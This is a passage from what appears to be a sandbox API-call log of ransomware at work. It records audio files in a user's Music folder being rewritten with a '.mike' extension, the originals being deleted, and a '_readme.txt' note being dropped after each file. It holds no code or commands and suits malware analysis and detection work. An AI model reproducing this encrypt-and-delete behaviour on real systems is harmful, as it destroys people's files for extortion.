(dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.457] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.689] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.696] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.698] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0154.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0154.703] WriteFile (in: hFile=0x1c8, lpBuffer=0x224b218*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x224b218*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0154.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.705] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav.mike", lpFilePart=0x0) returned 0x43 [0154.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.706] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav", dwFileAttributes=0x80) returned 1 [0154.706] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\ibl0Tc-fgpi8Er.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j-w7ymi\\ibl0tc-fgpi8er.wav")) returned 1 [0154.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.709] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\_readme.txt", lpFilePart=0x0) returned 0x37 [0154.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0154.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0154.710] WriteFile (in: hFile=0x1c8, lpBuffer=0x224e4bc*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x224e4bc*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0154.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0154.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0154.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0154.712] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0154.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.714] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", lpFilePart=0x0) returned 0x41 [0154.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.714] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav", lpFilePart=0x0) returned 0x3c [0154.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0154.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0154.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.716] WriteFile (in: hFile=0x1c8, lpBuffer=0x2253434*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2253434*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0154.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0154.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0154.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", lpFilePart=0x0) returned 0x41 [0154.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", lpFilePart=0x0) returned 0x41 [0154.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", lpFilePart=0x0) returned 0x41 [0154.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0154.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0154.751] WriteFile (in: hFile=0x1c8, lpBuffer=0x2280380*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2280380*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0154.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", lpFilePart=0x0) returned 0x41 [0154.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav.mike", lpFilePart=0x0) returned 0x41 [0154.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.753] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav", dwFileAttributes=0x80) returned 1 [0154.754] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\Ubl8OZMvn-Vh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\j-w7ymi\\ubl8ozmvn-vh.wav")) returned 1 [0154.755] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.756] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\_readme.txt", lpFilePart=0x0) returned 0x37 [0154.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0154.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0154.757] WriteFile (in: hFile=0x1c8, lpBuffer=0x22835ec*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x22835ec*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0154.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0154.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af118) returned 1 [0154.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0154.760] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0154.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0154.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0154.761] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0154.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0154.762] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav", lpFilePart=0x0) returned 0x42 [0154.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0154.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0154.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.764] WriteFile (in: hFile=0x1c8, lpBuffer=0x228652c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x228652c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0154.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0154.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0154.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.767] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.770] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.772] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.774] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.777] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.779] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.782] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0154.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0154.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0154.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0154.790] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\J-w7YMI\\v9n3M3Z T8pT07I5Ew.wav.mike", lpFilePart=0x0) returned 0x47 [0154.792] WriteFile (in: hFile=0x1c8, lpBuffer=0x20fbf80*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x20fbf80*, 